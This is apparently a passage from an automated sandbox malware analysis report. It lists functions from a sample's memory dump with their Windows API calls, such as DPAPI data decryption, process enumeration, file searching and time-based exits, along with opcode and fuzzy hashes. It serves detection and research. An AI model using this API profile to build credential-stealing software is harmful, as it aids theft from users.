                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 7c2d8164f1e3646397350be9fc020df652dd3dfb62b6a361584a29807186697b
                            • Instruction ID: 2fba8e828b47acdb7e91d66067ae83d586f60ead7cb5997f52da0cab807e79d6
                            • Opcode Fuzzy Hash: 7c2d8164f1e3646397350be9fc020df652dd3dfb62b6a361584a29807186697b
                            • Instruction Fuzzy Hash: 38123F719201189ADF58FBA0DD96EED73BEAF54300F4041ACB50A96491EE306F49CFD6
                            Function 00A49E88 Relevance: 9.1, Strings: 6, Instructions: 1603COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2I/$6r{$e ^$K]$P8w$Pv?
                            • API String ID: 0-3012428136
                            • Opcode ID: e4280b17f9b3a2d926fae64687f74b2e217bed882872de0a5918362961a62681
                            • Instruction ID: 0baf42b0ec0ea97af61c6aa0a790d6320380977f3c5b1ae62dd020614f87466b
                            • Opcode Fuzzy Hash: e4280b17f9b3a2d926fae64687f74b2e217bed882872de0a5918362961a62681
                            • Instruction Fuzzy Hash: 95B2E4F3A086049FE304AE2DEC8567ABBE9EF94320F1A493DE6C4C7744E63558058797
                            Function 00689AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                            • LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: Nh
                            • API String ID: 4291131564-3382845309
                            • Opcode ID: 8335f3246915526a25bdfcc5ab385d56df2e52546049395a429bd0e8e5141240
                            • Instruction ID: 20b5681b6eb2cf211115ae8ff58317b9971f37c4ba18c10548f730eae0796ea6
                            • Opcode Fuzzy Hash: 8335f3246915526a25bdfcc5ab385d56df2e52546049395a429bd0e8e5141240
                            • Instruction Fuzzy Hash: 0111A2B4241208AFEB14CF64DC95FAA77B5FB89704F208158F9159B390C7B6A901CBA4
                            Function 0068C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C87C
                            • lstrcat.KERNEL32(?,006A0B46), ref: 0068C943
                            • lstrcat.KERNEL32(?,006A0B47), ref: 0068C957
                            • lstrcat.KERNEL32(?,006A0B4E), ref: 0068C978
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: f1543ffd164ce46de801106f797b5df6b705db821dbceb678f8720974cf0de18
                            • Instruction ID: 837309f0f2e35924cd5f5f432775ac67fe5d243e0e2659d5ef24ceeb92012344
                            • Opcode Fuzzy Hash: f1543ffd164ce46de801106f797b5df6b705db821dbceb678f8720974cf0de18
                            • Instruction Fuzzy Hash: 894180B590420EDBDB10DFA4DD89FFEB7B9BB48304F1042A8F509A6280D7715A84CFA1
                            Function 00696920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0069696C
                            • sscanf.NTDLL ref: 00696999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006969B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006969C0
                            • ExitProcess.KERNEL32 ref: 006969DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: dd8fd08e3bf29036c86b7a3cbee9ae25bf2f6a0e0d4030cef12e5d069409d944
                            • Instruction ID: 6e7cda5d7d101a214a419c072a7557b4499b51ecd7e3ef928c82740d747543b4
                            • Opcode Fuzzy Hash: dd8fd08e3bf29036c86b7a3cbee9ae25bf2f6a0e0d4030cef12e5d069409d944
                            • Instruction Fuzzy Hash: 4821BA75D1420DABCF48EFE4D9459EEB7BAFF48304F04852EE506A3250EB345605CBA9
                            Function 00687240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0068724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00687254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00687281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006872A4
                            • LocalFree.KERNEL32(?), ref: 006872AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 6a4ab68042aaa7825253038fee844226ae2245f9a360a63c96b0e3efb9eeccd1
                            • Instruction ID: 56d658aa4a35a7408f40a0609756564fb7da6a1a03bdcf720c634ddbb690308a
                            • Opcode Fuzzy Hash: 6a4ab68042aaa7825253038fee844226ae2245f9a360a63c96b0e3efb9eeccd1
                            • Instruction Fuzzy Hash: 9B010CB5A40208BBEB14DFE4DD4AF9E77B9FB44B05F204155FB05AA2C0D6B0AA018B65
                            Function 00699600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0069961E
                            • Process32First.KERNEL32(006A0ACA,00000128), ref: 00699632
                            • Process32Next.KERNEL32(006A0ACA,00000128), ref: 00699647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0069965C
                            • CloseHandle.KERNEL32(006A0ACA), ref: 0069967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: d68793b03f40fa8bb2079b1683165a3639ffc8012501d23cbe74ba3a6d2d1baa
                            • Instruction ID: 4cf59cf971173e686d2d67d1e44692b91e5d194c06c9cac1f3c7731fda5348cc
                            • Opcode Fuzzy Hash: d68793b03f40fa8bb2079b1683165a3639ffc8012501d23cbe74ba3a6d2d1baa
                            • Instruction Fuzzy Hash: B7010C75A00208EBDF14DFA5DD48FEDBBF9FB48704F104198A905A6240D7349B41CF61
                            Function 00A4B891 Relevance: 6.6, Strings: 4, Instructions: 1617COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 7,Sn$f)/t$jR?y$nR?y
                            • API String ID: 0-2573954225
                            • Opcode ID: dd30091c08af3a81568b655971b8269c5210e837d63e3d2d0b1bff602678eb59
                            • Instruction ID: 2fb30da963038e6873cd7aca42eba041b0e05696b05e849cf4842f3876a996ab
                            • Opcode Fuzzy Hash: dd30091c08af3a81568b655971b8269c5210e837d63e3d2d0b1bff602678eb59
                            • Instruction Fuzzy Hash: 37B207F3A0C6049FE704AE29DC8567AFBE9EF94720F16853DEAC483744EA3558018797
                            Function 00A3B0FD Relevance: 6.6, Strings: 4, Instructions: 1581COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: O4_w$Qm{o$Qm{o$c;v
                            • API String ID: 0-1201255392
                            • Opcode ID: 8a2b42e84f5bcbdea22eb19b18f88ccd392dcfd108ae61b93d5e0705b09c26f3
                            • Instruction ID: 5cde147c060fcca77d138b1205165fe67987a0a608d9db6f08c9e20528f252fd
                            • Opcode Fuzzy Hash: 8a2b42e84f5bcbdea22eb19b18f88ccd392dcfd108ae61b93d5e0705b09c26f3
                            • Instruction Fuzzy Hash: 48B2E5F360C2049FD304AE2DEC8567ABBE9EF94720F1A493DEAC4C3744EA3558458697
                            Function 00A3CEEC Relevance: 6.3, Strings: 4, Instructions: 1349COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: m_;$\`y&$a/=\$I7|
                            • API String ID: 0-91157766
                            • Opcode ID: 9de742c1e867aa7c099a414a0f0a01422906e050770c283d72466d7e80b70018
                            • Instruction ID: 5873a8f6903abd3d18b9b0e37faa2ba6c54b61912f5abf5be5db91523f6675a7
                            • Opcode Fuzzy Hash: 9de742c1e867aa7c099a414a0f0a01422906e050770c283d72466d7e80b70018
                            • Instruction Fuzzy Hash: 3192F5F360C604AFE304AE29EC8567AFBE5EF94320F16893DE6C487744EA3558058797
                            Function 00698EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00685184,40000001,00000000,00000000,?,00685184), ref: 00698EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: cb028d8be11d2e1af350f668031803bb51d3a86a47b03597ac6a742e26e0b03b
                            • Instruction ID: 29265f49715db882b24fed8d7ff57a692e0bc4efee2fc3374089146fd189ace9
                            • Opcode Fuzzy Hash: cb028d8be11d2e1af350f668031803bb51d3a86a47b03597ac6a742e26e0b03b
                            • Instruction Fuzzy Hash: 8E110A70200208AFDF04CF64D884FA637BEBF8A354F109458F9158B650DB35E842DB60
                            Function 00697A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013ADF78,00000000,?,006A0E10,00000000,?,00000000,00000000), ref: 00697A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00697A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013ADF78,00000000,?,006A0E10,00000000,?,00000000,00000000,?), ref: 00697A7D
                            • wsprintfA.USER32 ref: 00697AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
